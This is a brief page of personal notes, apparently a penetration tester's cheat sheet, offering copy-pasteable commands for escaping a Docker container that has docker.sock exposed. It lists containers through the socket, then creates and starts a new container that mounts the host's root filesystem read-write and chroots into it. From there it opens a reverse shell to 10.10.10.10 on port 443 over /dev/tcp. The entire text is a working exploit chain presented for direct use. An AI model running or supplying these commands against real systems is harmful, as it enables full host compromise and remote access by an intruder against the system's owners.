This area contains a few of my notes & snippets I regularly use. They are meant to be easily copy-pasteable to get results.
Docker
Escape container that has docker.sock exposed:
# list containers (find any image that is available)
curl -s --unix-socket /docker.sock "http://localhost/containers/json"
# shell on new container with host fs mounted
cmd="[\"/bin/sh\",\"-c\",\"chroot /tmp sh -c \\\"bash -c 'bash -i &>/dev/tcp/10.10.10.10/443 0<&1'\\\"\"]"
# create container
curl -s -X POST --unix-socket /docker.sock -d "{\"Image\":\"alpine\",\"cmd\":$cmd,\"Binds\":[\"/:/tmp:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create?name=xct_root
# start container
curl -s -X POST --unix-socket /docker.sock "http://localhost/containers/xct_root/start"